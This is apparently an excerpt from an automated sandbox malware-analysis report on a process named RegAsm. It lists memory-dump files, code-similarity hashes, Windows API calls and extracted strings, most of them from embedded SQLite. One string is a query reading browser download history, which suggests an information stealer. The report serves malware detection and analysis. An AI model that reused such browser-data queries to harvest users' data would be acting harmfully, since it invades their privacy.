                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
                                                                                                                                                                                                                                                              • Instruction ID: 6a5b42347c377f844ade1d3a6e90b08039ce53e7bfde0da0af70a8f05f339440
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7AB1CDB1A14202AFC704EF28CC81A5ABBE5FF88218F48553DF949D3751E735F9648BA1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00407468
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00407734
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00407748
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
                                                                                                                                                                                                                                                                • Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347
                                                                                                                                                                                                                                                                • Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: _EH_prolog.MSVCRT ref: 00412F75
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: CreateThread.KERNEL32(00000000,00000000,00411D72,?,00000000,00000000), ref: 0041301B
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413023
                                                                                                                                                                                                                                                                • Part of subcall function 004010D8: _EH_prolog.MSVCRT ref: 004010DD
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: H_prolog$lstrcpy$lstrlen$lstrcat$CreateObjectSingleThreadWait
                                                                                                                                                                                                                                                              • String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
                                                                                                                                                                                                                                                              • API String ID: 3193997572-2241552939
                                                                                                                                                                                                                                                              • Opcode ID: 01ee42162ddfd50fec33091134fdbbdd2ca3b20a03df9997f96aea91f515be5b
                                                                                                                                                                                                                                                              • Instruction ID: d481aeb2630c3422184040b81c8f5da9760357faf1dbb8ec19a062efdad72ec8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01ee42162ddfd50fec33091134fdbbdd2ca3b20a03df9997f96aea91f515be5b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3B15531804248EADB09EBE6D955BDDBBB4AF18308F54446EF405732C2DF782B18DB26
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: CREATE TABLE x(input, token, start, end, position)$simple$unknown tokenizer: %s
                                                                                                                                                                                                                                                              • API String ID: 0-2679805236
                                                                                                                                                                                                                                                              • Opcode ID: 8f58d2d9861a0595b98414d06d35133b21da4c66652b34318d145dd52d8bde7c
                                                                                                                                                                                                                                                              • Instruction ID: 54ed9e5581bd2a2210530aaa6c6725b9638b8c7c3cb0b729aec98e56c1531b80
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f58d2d9861a0595b98414d06d35133b21da4c66652b34318d145dd52d8bde7c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A871CE719043468FCB00CF28C884A5AB7E8BF94255F8D452DEC5DD7241EB35EA4ACBE2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify user-function due to active statements
                                                                                                                                                                                                                                                              • API String ID: 0-3864549341
                                                                                                                                                                                                                                                              • Opcode ID: f8169611d4be9089dc4c839d0badfdca9b24abd2547aefda5d1aafd91c72fffb
                                                                                                                                                                                                                                                              • Instruction ID: 9b7d1fc43695ee793811ea5cc36f19c5783137a324da6986d492f2723090d8f3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8169611d4be9089dc4c839d0badfdca9b24abd2547aefda5d1aafd91c72fffb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C96189B5600B01ABF7028F35DC41B977798AF41706F8C412CE8D99B6C2E7A6E29487A1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • cannot UPDATE a subset of columns on fts5 contentless-delete table: %s, xrefs: 19850B3B
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: cannot UPDATE a subset of columns on fts5 contentless-delete table: %s
                                                                                                                                                                                                                                                              • API String ID: 0-2869280805
                                                                                                                                                                                                                                                              • Opcode ID: 3cb9bcb7fdaa6bac59cbdbf6f423eed04041b5a96fcfdb2fbfe3628aafd61941
                                                                                                                                                                                                                                                              • Instruction ID: a0a00b8b29b54cd2a2cd01eaedcdb53be6b0a8ac814546a30a2e3088ab555cda
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3cb9bcb7fdaa6bac59cbdbf6f423eed04041b5a96fcfdb2fbfe3628aafd61941
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA41F47A7013019FE700AF58EC80966F3E4FF94225B0845BEF64A87751E732E859C791
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: remove_diacritics=0$remove_diacritics=1$remove_diacritics=2$separators=$tokenchars=
                                                                                                                                                                                                                                                              • API String ID: 0-131617836
                                                                                                                                                                                                                                                              • Opcode ID: ef133dc2855b84e0d27dbb0ffaeee32883b920245d4d53d0b10f35571079d8d0
                                                                                                                                                                                                                                                              • Instruction ID: bc1ec51e474515c94c757a7ffbe0b1ff7dc7fe77da4126dcc45eb18ce4ff4f81
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ef133dc2855b84e0d27dbb0ffaeee32883b920245d4d53d0b10f35571079d8d0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B651287660428A8BD300CF28D841776B7F1FF61B24FAC41ADE8469B685D732ED86CB51
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: main$rbu_memory
                                                                                                                                                                                                                                                              • API String ID: 0-3973752345
                                                                                                                                                                                                                                                              • Opcode ID: 1be8bb3c7bbc48429d820de15f758f424a4ac34e2ba577f8b6f79bf7a8e239f1
                                                                                                                                                                                                                                                              • Instruction ID: fb571a88002984119145b71d13cf781da6261c1b42c9f269e58e1c86ce2b3f31
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1be8bb3c7bbc48429d820de15f758f424a4ac34e2ba577f8b6f79bf7a8e239f1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D451D0757003159FD700CF69D880B6AB3E8BFA5314F28402EEC49D7690DB35E949CB91
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 4077ba0946fb49bdc662dbe2aabd8bee206286afbb7a7b694d5bc4cd47ee9571
                                                                                                                                                                                                                                                              • Instruction ID: c8b6a9e42912f79f4dce622215f7a78964302b20f5a24dd9b82c1cff844bae59
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4077ba0946fb49bdc662dbe2aabd8bee206286afbb7a7b694d5bc4cd47ee9571
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A65150B0500271DFD7125B7DDE8CA1637BCBF04B45B1A5028EC4AD3191DB35E95ECAA2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %!0.15g$JSON cannot hold BLOB values$null
                                                                                                                                                                                                                                                              • API String ID: 0-3074873597
                                                                                                                                                                                                                                                              • Opcode ID: 03dba959a2c9cedb7f86f4d7bdb539a31c901951e260187076b40c4dc6ea7a46
                                                                                                                                                                                                                                                              • Instruction ID: 34f0a97764a524fdb257e247f76c274b53d954fbb4a2193bc68c298b4e9c4b80
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 03dba959a2c9cedb7f86f4d7bdb539a31c901951e260187076b40c4dc6ea7a46
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34417BB5A047006BE3149B58FC82BAA77E4FF51329F0C452DF551C25D2D3AAA59883E2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN), xrefs: 19841E2C
                                                                                                                                                                                                                                                              • no such database: %s, xrefs: 19841E05
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN)$no such database: %s
                                                                                                                                                                                                                                                              • API String ID: 0-1404816483
                                                                                                                                                                                                                                                              • Opcode ID: 4d53c381c1f2d5aa5ab4b02733377ebda468657e0103e6ab2893c091be0c8bfe
                                                                                                                                                                                                                                                              • Instruction ID: 4ff1eaadd1832e312bb625cb217e03b6d61488b29cdd4e7d4f28a31bf352312e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d53c381c1f2d5aa5ab4b02733377ebda468657e0103e6ab2893c091be0c8bfe
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E73121BA70030D6BC3105FA9CC00B6BB7D8FF95225F88417DF9589B241EA7AE90087E0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • strlen.MSVCRT ref: 0040D8ED
                                                                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT ref: 0040D90E
                                                                                                                                                                                                                                                                • Part of subcall function 0040D727: strlen.MSVCRT ref: 0040D733
